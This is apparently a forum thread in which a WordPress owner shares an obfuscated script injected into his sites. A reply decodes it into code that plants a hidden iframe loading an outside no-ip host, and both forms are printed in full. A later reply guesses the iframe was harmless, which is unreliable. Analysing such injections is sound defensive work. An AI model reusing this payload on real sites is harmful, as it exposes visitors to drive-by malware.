WP Site Injected - Can Anyone Decipher Code for Me?

N

nam6641

Supreme Member
Joined
Nov 15, 2008
Messages
1,470
Reaction score
926
Had Base64_Decode injected in some of my Wordpress sites.

Can anyone tell me what this is doing so I can try to track down who I need to f#ck up?

Code: 
<script>if(window.document)try{new location(12);}catch(qqq){aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){ss='';s=String;f='fro'+'m'+'C'+'h'+'ar';f+='Code';}ee='e';e=window.eval;t='y';}h=-2*Math.log(Math.E);n="3.5a3.5a51.5a50a15a19a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a19.5a60.5a3.5a3.5a3.5a51.5a50a56a47.5a53.5a49.5a56a19a19.5a28.5a3.5a3.5a61.5a15a49.5a53a56.5a49.5a15a60.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a58.5a56a51.5a57a49.5a19a16a29a51.5a50a56a47.5a53.5a49.5a15a56.5a56a48.5a29.5a18.5a51a57a57a55a28a22.5a22.5a52.5a51.5a49a23a25.5a26.5a27a25a22a54a54.5a21.5a51.5a55a22a54.5a56a50.5a22.5a30.5a50.5a54.5a29.5a24a18.5a15a58.5a51.5a49a57a51a29.5a18.5a23.5a23a18.5a15a51a49.5a51.5a50.5a51a57a29.5a18.5a23.5a23a18.5a15a56.5a57a59.5a53a49.5a29.5a18.5a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a28a51a51.5a49a49a49.5a54a28.5a55a54.5a56.5a51.5a57a51.5a54.5a54a28a47.5a48a56.5a54.5a53a57.5a57a49.5a28.5a53a49.5a50a57a28a23a28.5a57a54.5a55a28a23a28.5a18.5a30a29a22.5a51.5a50a56a47.5a53.5a49.5a30a16a19.5a28.5a3.5a3.5a61.5a3.5a3.5a50a57.5a54a48.5a57a51.5a54.5a54a15a51.5a50a56a47.5a53.5a49.5a56a19a19.5a60.5a3.5a3.5a3.5a58a47.5a56a15a50a15a29.5a15a49a54.5a48.5a57.5a53.5a49.5a54a57a22a48.5a56a49.5a47.5a57a49.5a33.5a53a49.5a53.5a49.5a54a57a19a18.5a51.5a50a56a47.5a53.5a49.5a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a56.5a56a48.5a18.5a21a18.5a51a57a57a55a28a22.5a22.5a52.5a51.5a49a23a25.5a26.5a27a25a22a54a54.5a21.5a51.5a55a22a54.5a56a50.5a22.5a30.5a50.5a54.5a29.5a24a18.5a19.5a28.5a50a22a56.5a57a59.5a53a49.5a22a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a29.5a18.5a51a51.5a49a49a49.5a54a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a55a54.5a56.5a51.5a57a51.5a54.5a54a29.5a18.5a47.5a48a56.5a54.5a53a57.5a57a49.5a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a53a49.5a50a57a29.5a18.5a23a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a57a54.5a55a29.5a18.5a23a18.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a58.5a51.5a49a57a51a18.5a21a18.5a23.5a23a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a51a49.5a51.5a50.5a51a57a18.5a21a18.5a23.5a23a18.5a19.5a28.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a22a47.5a55a55a49.5a54a49a32.5a51a51.5a53a49a19a50a19.5a28.5a3.5a3.5a61.5".split("a");for(i=0;0>i-n.length;i++){j=i;ss=ss+s[f](-h*(1+1*n[j]));}if(1)q=ss;if(f)e(q);</script>
 
Advertise on BHW
this is going to be executed:
Code: 
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://kid05784.no-ip.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://kid05784.no-ip.org/?go=2');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
 
TrevorB said:
How was this injected in to your WP site?
Click to expand...

some of my minisites from a year ago did not have the latest WP version installed, so i'm guessing they was a hole in previous version that they exploited.
 
nam6641 said:
some of my minisites from a year ago did not have the latest WP version installed, so i'm guessing they was a hole in previous version that they exploited.
Click to expand...

Hi,

Can you share your wp version?
 
Thanks for this. Of course it turns out to be a free hosting account, so they are looking into and ideally will shut down. Any idea what action is being executed by this?

sockpuppet said:
this is going to be executed:
Code: 
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://kid05784.no-ip.org/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://kid05784.no-ip.org/?go=2');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}
Click to expand...
 
I have the same codes on my wordpress sites. It keeps on popping up even i delete it.How do i get rid of it ?
 
Looks like an iframe code. Shows a page in a page. Not working now because someone took down that link. So currently it's not showing what it was meant to show. Most likely an affiliate page or some joke, porn or signature page. Hard to say now that the url is dead that was called in the frame.
 
Advertise on BHW
You must log in or register to reply here.
Sign up now!

Main Menu

Home Main Forum List Black Hat SEO White Hat SEO BHW Newbie Guide Blogging Black Hat Tools Social Media Downloads

Marketplace

Account Selling Content / Copywriting EBooks / Methods Hosting Misc Proxies For Sale SEO - Link building SEO - Packages Social Media Social Media - Panels Web Design More

Making Money

Affiliate Programs Hire a Freelancer IM Journeys Making Money Pay Per Click Site Flipping Want to Buy

BlackHat World

Dispute Resolution Forum Suggestions & Feedback Introductions Lounge
Back
Top